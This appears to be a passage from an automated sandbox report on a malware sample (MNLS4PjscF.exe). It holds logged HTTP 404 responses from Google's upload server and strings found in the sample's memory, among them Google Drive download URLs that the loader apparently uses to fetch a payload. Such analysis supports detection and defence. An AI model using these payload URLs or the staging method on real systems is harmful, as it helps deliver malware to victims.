'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA; expires=Sat, 06-Sep-2025 22:30:49 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIueAmsvM7F3cElPMqP19Db6f5FdYwo76t8n5dgztEtS_yFsj4MbB0jH9NVEneEYMhkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 22:30:54 GMTContent-Security-Policy: script-src 'nonce-4fkLeAGDX0f0Jph-V75TJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIuFBQubsEGfme0XUlCdg4JAWWdppaZSyqlAHKtA0YqQcqPefdo6SOgvNSSurEB9nuaTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 22:30:59 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-auBnxkYXn9HeSTFd86SO0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIsojyuZ9lVhC-LQxj-2OrXYze_eNZn-L6B4gH8dZf1oW5X-GxponLWkEseExxaOkdGiContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 22:31:04 GMTContent-Security-Policy: script-src 'nonce-UfblFQhV8jeLXmCY-TgCyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyItM5CJLo7i77_JfotP65MlINdkk4Um641emJXpAMgvJTAzagDyfAfs3CsWmGtciuog5Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 22:31:09 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-5fuob5HZ8nt0piMF6TaQlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIuOBsP8F2q0Ed-YeUizVbuD5wDtcE_sMXjLysawkfNqRSzSJG1onvH8l-DtATwmR1UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 22:31:14 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-HnWUlhdtlInDuuvz81zWlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIuh8d4IxsahtBDulJIJUSV10pzpx9aHnPcYr3akotYsTSOHLWUTqGzS2NwvfK03v1cCf1L3s4oContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 22:31:19 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-l6Yq4-dlVyNMyk38gf7kFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIvP2mWS-gA7B2nPZTthVzqnPON3zlfMYzwBreymPs1qVqBUrhJJXEGjAHTf6uziTT9AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 22:31:25 GMTContent-Security-Policy: script-src 'nonce-8JXjsLOtQcaE-a5GZy5cfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIs7RxfqreYUG378MAxOim2ID4tJU15JrPMAQkBMZ4r_3Henu5cGEnt9yjB0d9HjIZUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 22:31:30 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-GKKicmN9elSftuETiB6X7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: MNLS4PjscF.exe, 00000008.00000003.1694469091.00000000078B8000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1694535877.00000000078B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
      Source: MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1770338681.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1820603100.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1846585634.00000000078B8000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1898053327.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1796268741.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
      Source: MNLS4PjscF.exe, 00000008.00000003.1694469091.00000000078B8000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1694535877.00000000078B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.
      Source: MNLS4PjscF.exe, 00000000.00000002.1550432579.0000000000409000.00000004.00000001.01000000.00000003.sdmp, MNLS4PjscF.exe, 00000000.00000000.879599687.0000000000409000.00000008.00000001.01000000.00000003.sdmp, MNLS4PjscF.exe, 00000008.00000000.1546772030.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.000000000789E000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download
      Source: MNLS4PjscF.exe, 00000008.00000003.1820603100.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1846585634.00000000078B8000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1898053327.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1796268741.00000000078B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/NYp
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/_1
      Source: MNLS4PjscF.exe, 00000008.00000003.1796268741.00000000078B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r
      Source: MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn(
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn:
      Source: MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1770338681.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1820603100.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1846585634.00000000078B8000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1898053327.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1796268741.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5GuxnD
      Source: MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1770338681.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1820603100.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1846585634.00000000078B8000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1898053327.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1796268741.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5GuxnMicroso
      Source: MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1820603100.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1846585634.00000000078B8000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1898053327.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1796268741.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5GuxnZ
      Source: MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxnht9u7UOKSY5Guxn
      Source: MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxnht9u7UOKSY5GuxnEI
      Source: MNLS4PjscF.exe, 00000008.00000003.1898053327.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxnht9u7UOKSY5GuxneI
      Source: MNLS4PjscF.exe, 00000008.00000003.1846585634.00000000078B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxnst
      Source: MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxnt
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxnxed=x
      Source: MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1770338681.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1820603100.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1846585634.00000000078B8000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1898053327.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1796268741.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: MNLS4PjscF.exe, 00000008.00000003.1770338681.00000000078B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/MhX
      Source: MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/PhG
      Source: MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975171131.00000000078F2000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1770296919.00000000078F2000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2080151629.00000000078F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download1
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download2S
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download3/
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download7
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=downloada_
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=downloade
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=downloadeP
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=downloadfS
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=downloadhS
      Source: MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=downloadid
